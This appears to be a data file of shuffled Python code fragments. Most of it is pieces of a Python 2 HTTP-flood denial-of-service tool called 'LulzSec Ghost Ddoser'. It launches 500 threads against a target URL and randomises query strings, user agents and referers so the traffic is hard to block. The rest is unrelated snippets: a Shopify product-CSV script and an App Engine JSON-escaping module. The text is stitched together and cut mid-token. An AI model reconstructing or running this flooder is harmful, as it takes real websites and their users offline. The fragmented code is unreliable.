chr(a) return(out_str) def usage(): print 'Pra usar python", "<EMAIL>)') headers_useragents.append('BaboomBot/1.x.x (+http://www.baboom.us)') headers_useragents.append('BackStreet Browser 3.x') headers_useragents.append('BaiduImagespider+(+http://www.baidu.jp/search/s308.html)') headers_useragents.append('BaiDuSpider') headers_useragents.append('Baiduspider+(+http://help.baidu.jp/system/05.html)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider.htm)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider_jp.html)') headers_useragents.append('Balihoo/Nutch-1.0-dev (Crawler", "Bucket Challenge') keyword_top.append('Flappy Bird') keyword_top.append('Conchita Wurst') keyword_top.append('ISIS') keyword_top.append('Frozen') keyword_top.append('014 Sochi Winter Olympics') keyword_top.append('IPhone')", "headers_useragents.append('Allrati/1.1 (+)') headers_useragents.append('AltaVista Intranet V2.0 AVS EVAL <EMAIL>') headers_useragents.append('AltaVista Intranet V2.0 Compaq Altavista", "OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v40) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v38) (Mac OS", "Browser/SEMC-Browser/4.1') headers_useragents.append('J-PHONE/5.0/V801SA/SN123456789012345 SA/0001JP Profile/MIDP-1.0') headers_useragents.append('Mozilla/3.0(DDIPOCKET;JRC/AH-J3001V,AH-J3002V/1.0/0100/c50)CNF/2.0') headers_useragents.append('PDXGW/1.0') headers_useragents.append('ASTEL/1.0/J-0511.00/c10/smel') headers_useragents.append('Mozilla/5.0 (Macintosh; U; Intel Mac OS", "class HTTPThread(threading.Thread): def run(self): try: while flag<2: code=httpcall(url) if (code==800) & (safe==1): set_flag(2)", "273 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.12 rev. 260 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.06 rev. 251 (http://gsitecrawler.com/)') headers_useragents.append('iTunes/9.1.1') headers_useragents.append('iTunes/9.0.3 (Macintosh;", "WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36') # generates a referer array def", "headers_useragents.append('iTunes/9.1.1') headers_useragents.append('iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)') headers_useragents.append('iTunes/9.0.3') headers_useragents.append('iTunes/9.0.2 (Windows;", "headers_useragents.append('ArabyBot (compatible; Mozilla/5.0; GoogleBot; FAST Crawler 6.4; http://www.araby.com;)') headers_useragents.append('ArachBot') headers_useragents.append('Arachnoidea (<EMAIL>)') headers_useragents.append('aranhabot') headers_useragents.append('ArchitextSpider')", "(compatible; MSIE 5.01;') headers_useragents.append('PalmOS 3.0) EudoraWeb 2.1') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 4.01;') headers_useragents.append('Windows CE;", "| || ' : `.`.) _,' |;._:: | | | | `| :", "headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Nexus 10 Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19')", "m.group(1) for i in range(500): t = HTTPThread() t.start() t = MonitorThread() t.start()", "v4.xx.x') headers_useragents.append('Ad Muncher v4x Build xxxxx') headers_useragents.append('Adaxas Spider (http://www.adaxas.net/)') headers_useragents.append('Advanced Browser (http://www.avantbrowser.com)') headers_useragents.append('AESOP_com_SpiderMan')", "Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; ru-ru; Explay Surfer 7.02 Build/ICS.g12refM703A1HZ1.20121009)", "- http://www.zipcommander.com/') headers_useragents.append('2Bone_LinkChecker/1.0 libwww-perl/5.64') headers_useragents.append('4anything.com LinkChecker v2.0') headers_useragents.append('8484 Boston Project v 1.0') headers_useragents.append(':robot/1.0", "import urllib2 import sys import threading import random import re #global params url=''", "NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0;", "Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.2; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile", "libwww/5.4.0') headers_useragents.append('amaya/10.1 libwww/5.4.0') headers_useragents.append('amaya/10 libwww/5.4.0') headers_useragents.append('amaya/9.55 libwww/5.4.0') headers_useragents.append('amaya/9.54 libwww/5.4.0') headers_useragents.append('amaya/9.52 libwww/5.4.0') headers_useragents.append('amaya/9.51 libwww/5.4.0')", "like Gecko) Chrome/41.0.2227.1 Safari/537.36') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0", "(Linux; Android 4.2.1; Nexus 7 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0", "Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0", "safe=1 # generates a user agent array def useragent_list(): global headers_useragents headers_useragents.append('Mozilla/5.0 (Windows;", "8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET", "#builds random ascii string def buildblock(size): out_str = '' for i in range(0,", "headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-gb; GT-I9300", "safe=0 def inc_counter(): global request_counter request_counter+=1 def set_flag(val): global flag flag=val def set_safe():", "(PDA; Windows CE/0.9.3) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/1.0.1) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; SL-C750/1.0,Embedix/Qtopia/1.3.0) NetFront/3.0", "Wurst') keyword_top.append('ISIS') keyword_top.append('Frozen') keyword_top.append('014 Sochi Winter Olympics') keyword_top.append('IPhone') keyword_top.append('Samsung Galaxy S5') keyword_top.append('Nexus 6')", "'Pra usar python Lulz.py <url>' print 'LulzSec Ghost Ddoser By V3I0p3r' print 'Script", "headers_useragents.append('AIBOT/2.1 By +(www.21seek.com A Real artificial intelligence search engine China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0", "request_counter request_counter+=1 def set_flag(val): global flag flag=val def set_safe(): global safe safe=1 #", "keyword_top.append('ALS Ice Bucket Challenge') keyword_top.append('Flappy Bird') keyword_top.append('Conchita Wurst') keyword_top.append('ISIS') keyword_top.append('Frozen') keyword_top.append('014 Sochi Winter", "7.02 Build/ICS.g12refM703A1HZ1.20121009) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus", "x86_64)') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1;') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.4; en-us;') headers_useragents.append('Version/4.0 Safari/534.30')", "_// ~ _// ~ ~ / / / / / / / /", "/ ~ ~~ ~~~ ~~~ ~~~ ~~~ \"\"\" #http request def httpcall(url): useragent_list()", "like Gecko) Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; ru-ru; Explay Surfer", "headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; fr-fr;", "if url.count(\"?\")>0: param_joiner=\"&\" else: param_joiner=\"?\" request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) +", "headers_useragents.append('augurnfind V-1.x') headers_useragents.append('autoemailspider') headers_useragents.append('autohttp') headers_useragents.append('autowebdir 1.1 (www.autowebdir.com)') headers_useragents.append('AV Fetch 1.0') headers_useragents.append('Avant Browser (http://www.avantbrowser.com)')", "6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows", "headers_useragents.append('ASPSeek/1.2.x') headers_useragents.append('ASPSeek/1.2.xa') headers_useragents.append('ASPseek/1.2.xx') headers_useragents.append('ASPSeek/1.2.xxpre') headers_useragents.append('ASSORT/0.10') headers_useragents.append('asterias/2.0') headers_useragents.append('AtlocalBot/1.1 +(http://www.atlocal.com/local-web-site-owner.html)') headers_useragents.append('Atomic_Email_Hunter/4.0') headers_useragents.append('Atomz/1.0') headers_useragents.append('atSpider/1.0') headers_useragents.append('Attentio/Nutch-0.9-dev (Attentios", "artificial intelligence search engine China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; <EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot", "a = random.randint(65, 90) out_str += chr(a) return(out_str) def usage(): print 'Pra usar", "flag flag=val def set_safe(): global safe safe=1 # generates a user agent array", "http://aipbot.com; a<EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)') headers_useragents.append('AlertInfo 2.0 (Powered", "MonitorThread(threading.Thread): def run(self): previous=request_counter while flag==0: if (previous+500<request_counter) & (previous<>request_counter): print \"%d lULZ", "http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v38) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('DomainsDB.net MetaCrawler v.0.9.7c (http://domainsdb.net/)') headers_useragents.append('GSiteCrawler/v1.20 rev.", "= url + \"/\" m = re.search('http\\://([^/]*)/?.*', url) host = m.group(1) for i", "headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.2; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19')", "`--. ) /|-._: : | \\ \\ / / :_| ;`-._; __..--'; :", "#http request def httpcall(url): useragent_list() referer_list() code=0 if url.count(\"?\")>0: param_joiner=\"&\" else: param_joiner=\"?\" request", "CE/0.9.3) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/1.0.1) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; SL-C750/1.0,Embedix/Qtopia/1.3.0) NetFront/3.0 Zaurus C750')", "headers_useragents.append('AVSearch-1.0(<EMAIL>)') headers_useragents.append('AVSearch-2.0-fusionIdx-14-CompetitorWebSites') headers_useragents.append('AVSearch-3.0(AltaVista/AVC)') headers_useragents.append('AWeb') headers_useragents.append('axadine/ (Axadine Crawler; http://www.axada.de/; )') headers_useragents.append('AxmoRobot - Crawling your", "by www.123spider.de') headers_useragents.append('192.comAgent') headers_useragents.append('1st ZipCommander (Net) - http://www.zipcommander.com/') headers_useragents.append('2Bone_LinkChecker/1.0 libwww-perl/5.64') headers_useragents.append('4anything.com LinkChecker v2.0')", "if sys.argv[1]==\"help\": usage() sys.exit() else: print \"Script Priv8 Privada da LulzSec Ghost\" if", "headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')", "Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36')", "headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/0.9.3) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA;" ]
[ "with open(path) as csvfile: df = pd.read_csv(csvfile) url = df['url'] products = extract_products_json(url)", "'./stores.csv' import pandas as pd from shopify import extract_products_json result = '' with", "extract_products_json result = '' with open(path) as csvfile: df = pd.read_csv(csvfile) url =", "result = '' with open(path) as csvfile: df = pd.read_csv(csvfile) url = df['url']", "open(path) as csvfile: df = pd.read_csv(csvfile) url = df['url'] products = extract_products_json(url) print(products)", "= '' with open(path) as csvfile: df = pd.read_csv(csvfile) url = df['url'] products", "as pd from shopify import extract_products_json result = '' with open(path) as csvfile:", "= './stores.csv' import pandas as pd from shopify import extract_products_json result = ''", "shopify import extract_products_json result = '' with open(path) as csvfile: df = pd.read_csv(csvfile)", "import extract_products_json result = '' with open(path) as csvfile: df = pd.read_csv(csvfile) url", "'' with open(path) as csvfile: df = pd.read_csv(csvfile) url = df['url'] products =", "path = './stores.csv' import pandas as pd from shopify import extract_products_json result =", "from shopify import extract_products_json result = '' with open(path) as csvfile: df =", "pd from shopify import extract_products_json result = '' with open(path) as csvfile: df", "pandas as pd from shopify import extract_products_json result = '' with open(path) as", "import pandas as pd from shopify import extract_products_json result = '' with open(path)" ]
[ "result.append(\"\\\\u%.4X\" % ord(c)) else: result.append(c) return \"\".join(result) def to_json(obj): t = type(obj) if", "query.get() def to_json(self): return to_json({'name': self.name, 'count': self.count}) class Version(db.Model): current_suite = db.StringProperty()", "'\\f': '\\\\f', '\\n': '\\\\n', '\\r': '\\\\r', '\\t': '\\\\t' } def json_escape(s): result =", "% ','.join(props) elif (t is int) or (t is long): return str(obj) elif", "def to_json(obj): t = type(obj) if t is dict: props = [ ]", "[ ] for (key, value) in obj.items(): props.append('\"%s\":%s' % (json_escape(key), to_json(value))) return '{%s}'", "= [ ] for (key, value) in obj.items(): props.append('\"%s\":%s' % (json_escape(key), to_json(value))) return", "in obj.items(): props.append('\"%s\":%s' % (json_escape(key), to_json(value))) return '{%s}' % ','.join(props) elif (t is", ":2 AND serial < :3', suite, start, end) return query.fetch(end - start) class", "AND serial < :3', suite, start, end) return query.fetch(end - start) class Suite(db.Model):", "lookup_range(suite, start, end): query = Case.gql('WHERE suite = :1 AND serial >= :2", "google.appengine.ext import db import cStringIO _ESCAPEES = { '\"': '\\\\\"', '\\\\': '\\\\\\\\', '\\b':", "str) or (t is unicode): return '\"%s\"' % json_escape(obj) elif (t is list):", "dict: props = [ ] for (key, value) in obj.items(): props.append('\"%s\":%s' % (json_escape(key),", "return {'name': self.name, 'isNegative': self.is_negative, 'source': unicode(self.source)} def to_basic_json(self): return to_json({'name': self.name, 'isNegative':", "found in the LICENSE file. from google.appengine.ext import db import cStringIO _ESCAPEES =", "to_json(self): return to_json({'name': self.name, 'count': self.count}) class Version(db.Model): current_suite = db.StringProperty() created =", "_ESCAPEES = { '\"': '\\\\\"', '\\\\': '\\\\\\\\', '\\b': '\\\\b', '\\f': '\\\\f', '\\n': '\\\\n',", "(t is list): return '[%s]' % ','.join([to_json(o) for o in obj]) elif t", "Suite.gql('WHERE name = :1', suite) return query.get() def to_json(self): return to_json({'name': self.name, 'count':", "'\\r': '\\\\r', '\\t': '\\\\t' } def json_escape(s): result = [] for c in", "return to_json({'name': self.name, 'isNegative': self.is_negative, 'serial': self.serial}) @staticmethod def lookup(suite, serial): query =", "obj]) elif t is bool: if obj: return '1' else: return '0' else:", "suite = db.StringProperty() source = db.TextProperty() serial = db.IntegerProperty() is_negative = db.BooleanProperty() def", "(t is long): return str(obj) elif (t is str) or (t is unicode):", "Copyright 2009 the Sputnik authors. All rights reserved. # This code is governed", "'\\\\': '\\\\\\\\', '\\b': '\\\\b', '\\f': '\\\\f', '\\n': '\\\\n', '\\r': '\\\\r', '\\t': '\\\\t' }", "ord(c)) else: result.append(c) return \"\".join(result) def to_json(obj): t = type(obj) if t is", "return '{%s}' % ','.join(props) elif (t is int) or (t is long): return", "governed by the BSD license found in the LICENSE file. from google.appengine.ext import", "= Case.gql('WHERE suite = :1 AND serial = :2', suite, serial) return query.get()", "= db.TextProperty() serial = db.IntegerProperty() is_negative = db.BooleanProperty() def to_json(self): return {'name': self.name,", "in the LICENSE file. from google.appengine.ext import db import cStringIO _ESCAPEES = {", "lookup(suite): query = Suite.gql('WHERE name = :1', suite) return query.get() def to_json(self): return", "suite, start, end) return query.fetch(end - start) class Suite(db.Model): name = db.StringProperty() count", "= [] for c in s: escapee = _ESCAPEES.get(c, None) if escapee: result.append(escapee)", "if obj: return '1' else: return '0' else: return to_json(obj.to_json()) class Case(db.Model): name", "@staticmethod def lookup(suite, serial): query = Case.gql('WHERE suite = :1 AND serial =", "to_json(obj.to_json()) class Case(db.Model): name = db.StringProperty() suite = db.StringProperty() source = db.TextProperty() serial", "if t is dict: props = [ ] for (key, value) in obj.items():", "'\\t': '\\\\t' } def json_escape(s): result = [] for c in s: escapee", "if escapee: result.append(escapee) elif c < ' ': result.append(\"\\\\u%.4X\" % ord(c)) else: result.append(c)", "serial = :2', suite, serial) return query.get() @staticmethod def lookup_range(suite, start, end): query", "unicode(self.source)} def to_basic_json(self): return to_json({'name': self.name, 'isNegative': self.is_negative, 'serial': self.serial}) @staticmethod def lookup(suite,", "props = [ ] for (key, value) in obj.items(): props.append('\"%s\":%s' % (json_escape(key), to_json(value)))", "def lookup_range(suite, start, end): query = Case.gql('WHERE suite = :1 AND serial >=", "db.DateTimeProperty(auto_now_add=True) @staticmethod def get(): query = Version.gql(\"ORDER BY created DESC LIMIT 1\") return", "authors. All rights reserved. # This code is governed by the BSD license", "result.append(escapee) elif c < ' ': result.append(\"\\\\u%.4X\" % ord(c)) else: result.append(c) return \"\".join(result)", ":1', suite) return query.get() def to_json(self): return to_json({'name': self.name, 'count': self.count}) class Version(db.Model):", "= db.IntegerProperty() is_negative = db.BooleanProperty() def to_json(self): return {'name': self.name, 'isNegative': self.is_negative, 'source':", "suite = :1 AND serial >= :2 AND serial < :3', suite, start,", "[] for c in s: escapee = _ESCAPEES.get(c, None) if escapee: result.append(escapee) elif", "def json_escape(s): result = [] for c in s: escapee = _ESCAPEES.get(c, None)", "# This code is governed by the BSD license found in the LICENSE", "'0' else: return to_json(obj.to_json()) class Case(db.Model): name = db.StringProperty() suite = db.StringProperty() source", "in obj]) elif t is bool: if obj: return '1' else: return '0'", ":3', suite, start, end) return query.fetch(end - start) class Suite(db.Model): name = db.StringProperty()", "name = :1', suite) return query.get() def to_json(self): return to_json({'name': self.name, 'count': self.count})", "t is bool: if obj: return '1' else: return '0' else: return to_json(obj.to_json())", "'[%s]' % ','.join([to_json(o) for o in obj]) elif t is bool: if obj:", "'\\\\\\\\', '\\b': '\\\\b', '\\f': '\\\\f', '\\n': '\\\\n', '\\r': '\\\\r', '\\t': '\\\\t' } def", "is_negative = db.BooleanProperty() def to_json(self): return {'name': self.name, 'isNegative': self.is_negative, 'source': unicode(self.source)} def", "class Case(db.Model): name = db.StringProperty() suite = db.StringProperty() source = db.TextProperty() serial =", "All rights reserved. # This code is governed by the BSD license found", "'\\\\t' } def json_escape(s): result = [] for c in s: escapee =", "result = [] for c in s: escapee = _ESCAPEES.get(c, None) if escapee:", "t is dict: props = [ ] for (key, value) in obj.items(): props.append('\"%s\":%s'", "query.get() @staticmethod def lookup_range(suite, start, end): query = Case.gql('WHERE suite = :1 AND", "or (t is unicode): return '\"%s\"' % json_escape(obj) elif (t is list): return", "self.name, 'isNegative': self.is_negative, 'source': unicode(self.source)} def to_basic_json(self): return to_json({'name': self.name, 'isNegative': self.is_negative, 'serial':", "(t is str) or (t is unicode): return '\"%s\"' % json_escape(obj) elif (t", "','.join([to_json(o) for o in obj]) elif t is bool: if obj: return '1'", "else: return '0' else: return to_json(obj.to_json()) class Case(db.Model): name = db.StringProperty() suite =", "def lookup(suite, serial): query = Case.gql('WHERE suite = :1 AND serial = :2',", "'serial': self.serial}) @staticmethod def lookup(suite, serial): query = Case.gql('WHERE suite = :1 AND", "is str) or (t is unicode): return '\"%s\"' % json_escape(obj) elif (t is", "serial): query = Case.gql('WHERE suite = :1 AND serial = :2', suite, serial)", "Suite(db.Model): name = db.StringProperty() count = db.IntegerProperty() @staticmethod def lookup(suite): query = Suite.gql('WHERE", "{'name': self.name, 'isNegative': self.is_negative, 'source': unicode(self.source)} def to_basic_json(self): return to_json({'name': self.name, 'isNegative': self.is_negative,", "reserved. # This code is governed by the BSD license found in the", "value) in obj.items(): props.append('\"%s\":%s' % (json_escape(key), to_json(value))) return '{%s}' % ','.join(props) elif (t", "to_json(self): return {'name': self.name, 'isNegative': self.is_negative, 'source': unicode(self.source)} def to_basic_json(self): return to_json({'name': self.name,", "return query.get() def to_json(self): return to_json({'name': self.name, 'count': self.count}) class Version(db.Model): current_suite =", "is long): return str(obj) elif (t is str) or (t is unicode): return", "= :1 AND serial = :2', suite, serial) return query.get() @staticmethod def lookup_range(suite,", "} def json_escape(s): result = [] for c in s: escapee = _ESCAPEES.get(c,", "is unicode): return '\"%s\"' % json_escape(obj) elif (t is list): return '[%s]' %", "def to_basic_json(self): return to_json({'name': self.name, 'isNegative': self.is_negative, 'serial': self.serial}) @staticmethod def lookup(suite, serial):", "#!/usr/bin/python # Copyright 2009 the Sputnik authors. All rights reserved. # This code", ":1 AND serial >= :2 AND serial < :3', suite, start, end) return", "LICENSE file. from google.appengine.ext import db import cStringIO _ESCAPEES = { '\"': '\\\\\"',", "c < ' ': result.append(\"\\\\u%.4X\" % ord(c)) else: result.append(c) return \"\".join(result) def to_json(obj):", "'1' else: return '0' else: return to_json(obj.to_json()) class Case(db.Model): name = db.StringProperty() suite", "suite) return query.get() def to_json(self): return to_json({'name': self.name, 'count': self.count}) class Version(db.Model): current_suite", "elif t is bool: if obj: return '1' else: return '0' else: return", "rights reserved. # This code is governed by the BSD license found in", "' ': result.append(\"\\\\u%.4X\" % ord(c)) else: result.append(c) return \"\".join(result) def to_json(obj): t =", "def lookup(suite): query = Suite.gql('WHERE name = :1', suite) return query.get() def to_json(self):", "the Sputnik authors. All rights reserved. # This code is governed by the", "is list): return '[%s]' % ','.join([to_json(o) for o in obj]) elif t is", "{ '\"': '\\\\\"', '\\\\': '\\\\\\\\', '\\b': '\\\\b', '\\f': '\\\\f', '\\n': '\\\\n', '\\r': '\\\\r',", "self.name, 'isNegative': self.is_negative, 'serial': self.serial}) @staticmethod def lookup(suite, serial): query = Case.gql('WHERE suite", "code is governed by the BSD license found in the LICENSE file. from", "file. from google.appengine.ext import db import cStringIO _ESCAPEES = { '\"': '\\\\\"', '\\\\':", "= :1', suite) return query.get() def to_json(self): return to_json({'name': self.name, 'count': self.count}) class", "or (t is long): return str(obj) elif (t is str) or (t is", "@staticmethod def get(): query = Version.gql(\"ORDER BY created DESC LIMIT 1\") return query.get()", "to_basic_json(self): return to_json({'name': self.name, 'isNegative': self.is_negative, 'serial': self.serial}) @staticmethod def lookup(suite, serial): query", "'\\n': '\\\\n', '\\r': '\\\\r', '\\t': '\\\\t' } def json_escape(s): result = [] for", "t = type(obj) if t is dict: props = [ ] for (key,", "return '\"%s\"' % json_escape(obj) elif (t is list): return '[%s]' % ','.join([to_json(o) for", "serial >= :2 AND serial < :3', suite, start, end) return query.fetch(end -", "= :2', suite, serial) return query.get() @staticmethod def lookup_range(suite, start, end): query =", "= db.StringProperty() created = db.DateTimeProperty(auto_now_add=True) @staticmethod def get(): query = Version.gql(\"ORDER BY created", "'\\\\r', '\\t': '\\\\t' } def json_escape(s): result = [] for c in s:", "serial < :3', suite, start, end) return query.fetch(end - start) class Suite(db.Model): name", "'\\b': '\\\\b', '\\f': '\\\\f', '\\n': '\\\\n', '\\r': '\\\\r', '\\t': '\\\\t' } def json_escape(s):", "is dict: props = [ ] for (key, value) in obj.items(): props.append('\"%s\":%s' %", "'count': self.count}) class Version(db.Model): current_suite = db.StringProperty() created = db.DateTimeProperty(auto_now_add=True) @staticmethod def get():", "start, end): query = Case.gql('WHERE suite = :1 AND serial >= :2 AND", "= db.StringProperty() count = db.IntegerProperty() @staticmethod def lookup(suite): query = Suite.gql('WHERE name =", "bool: if obj: return '1' else: return '0' else: return to_json(obj.to_json()) class Case(db.Model):", "- start) class Suite(db.Model): name = db.StringProperty() count = db.IntegerProperty() @staticmethod def lookup(suite):", "escapee = _ESCAPEES.get(c, None) if escapee: result.append(escapee) elif c < ' ': result.append(\"\\\\u%.4X\"", "'\\\\n', '\\r': '\\\\r', '\\t': '\\\\t' } def json_escape(s): result = [] for c", "import db import cStringIO _ESCAPEES = { '\"': '\\\\\"', '\\\\': '\\\\\\\\', '\\b': '\\\\b',", "name = db.StringProperty() suite = db.StringProperty() source = db.TextProperty() serial = db.IntegerProperty() is_negative", ":2', suite, serial) return query.get() @staticmethod def lookup_range(suite, start, end): query = Case.gql('WHERE", "source = db.TextProperty() serial = db.IntegerProperty() is_negative = db.BooleanProperty() def to_json(self): return {'name':", "@staticmethod def lookup_range(suite, start, end): query = Case.gql('WHERE suite = :1 AND serial", "db.TextProperty() serial = db.IntegerProperty() is_negative = db.BooleanProperty() def to_json(self): return {'name': self.name, 'isNegative':", "lookup(suite, serial): query = Case.gql('WHERE suite = :1 AND serial = :2', suite,", "] for (key, value) in obj.items(): props.append('\"%s\":%s' % (json_escape(key), to_json(value))) return '{%s}' %", "start) class Suite(db.Model): name = db.StringProperty() count = db.IntegerProperty() @staticmethod def lookup(suite): query", "% (json_escape(key), to_json(value))) return '{%s}' % ','.join(props) elif (t is int) or (t", "o in obj]) elif t is bool: if obj: return '1' else: return", "Case(db.Model): name = db.StringProperty() suite = db.StringProperty() source = db.TextProperty() serial = db.IntegerProperty()", "query = Case.gql('WHERE suite = :1 AND serial = :2', suite, serial) return", "AND serial >= :2 AND serial < :3', suite, start, end) return query.fetch(end", "unicode): return '\"%s\"' % json_escape(obj) elif (t is list): return '[%s]' % ','.join([to_json(o)", "BSD license found in the LICENSE file. from google.appengine.ext import db import cStringIO", "= { '\"': '\\\\\"', '\\\\': '\\\\\\\\', '\\b': '\\\\b', '\\f': '\\\\f', '\\n': '\\\\n', '\\r':", "def to_json(self): return to_json({'name': self.name, 'count': self.count}) class Version(db.Model): current_suite = db.StringProperty() created", "Version(db.Model): current_suite = db.StringProperty() created = db.DateTimeProperty(auto_now_add=True) @staticmethod def get(): query = Version.gql(\"ORDER", "is int) or (t is long): return str(obj) elif (t is str) or", "= db.IntegerProperty() @staticmethod def lookup(suite): query = Suite.gql('WHERE name = :1', suite) return", "\"\".join(result) def to_json(obj): t = type(obj) if t is dict: props = [", "return '0' else: return to_json(obj.to_json()) class Case(db.Model): name = db.StringProperty() suite = db.StringProperty()", "2009 the Sputnik authors. All rights reserved. # This code is governed by", "long): return str(obj) elif (t is str) or (t is unicode): return '\"%s\"'", "db import cStringIO _ESCAPEES = { '\"': '\\\\\"', '\\\\': '\\\\\\\\', '\\b': '\\\\b', '\\f':", "Case.gql('WHERE suite = :1 AND serial >= :2 AND serial < :3', suite,", "','.join(props) elif (t is int) or (t is long): return str(obj) elif (t", "None) if escapee: result.append(escapee) elif c < ' ': result.append(\"\\\\u%.4X\" % ord(c)) else:", "to_json(obj): t = type(obj) if t is dict: props = [ ] for", "by the BSD license found in the LICENSE file. from google.appengine.ext import db", "self.count}) class Version(db.Model): current_suite = db.StringProperty() created = db.DateTimeProperty(auto_now_add=True) @staticmethod def get(): query", "in s: escapee = _ESCAPEES.get(c, None) if escapee: result.append(escapee) elif c < '", "list): return '[%s]' % ','.join([to_json(o) for o in obj]) elif t is bool:", "= :1 AND serial >= :2 AND serial < :3', suite, start, end)", "for (key, value) in obj.items(): props.append('\"%s\":%s' % (json_escape(key), to_json(value))) return '{%s}' % ','.join(props)", "self.is_negative, 'serial': self.serial}) @staticmethod def lookup(suite, serial): query = Case.gql('WHERE suite = :1", "'\"%s\"' % json_escape(obj) elif (t is list): return '[%s]' % ','.join([to_json(o) for o", "def to_json(self): return {'name': self.name, 'isNegative': self.is_negative, 'source': unicode(self.source)} def to_basic_json(self): return to_json({'name':", "Case.gql('WHERE suite = :1 AND serial = :2', suite, serial) return query.get() @staticmethod", "elif c < ' ': result.append(\"\\\\u%.4X\" % ord(c)) else: result.append(c) return \"\".join(result) def", "return to_json(obj.to_json()) class Case(db.Model): name = db.StringProperty() suite = db.StringProperty() source = db.TextProperty()", "= db.BooleanProperty() def to_json(self): return {'name': self.name, 'isNegative': self.is_negative, 'source': unicode(self.source)} def to_basic_json(self):", "= Case.gql('WHERE suite = :1 AND serial >= :2 AND serial < :3',", "import cStringIO _ESCAPEES = { '\"': '\\\\\"', '\\\\': '\\\\\\\\', '\\b': '\\\\b', '\\f': '\\\\f',", "= db.DateTimeProperty(auto_now_add=True) @staticmethod def get(): query = Version.gql(\"ORDER BY created DESC LIMIT 1\")", "json_escape(obj) elif (t is list): return '[%s]' % ','.join([to_json(o) for o in obj])", "'\\\\f', '\\n': 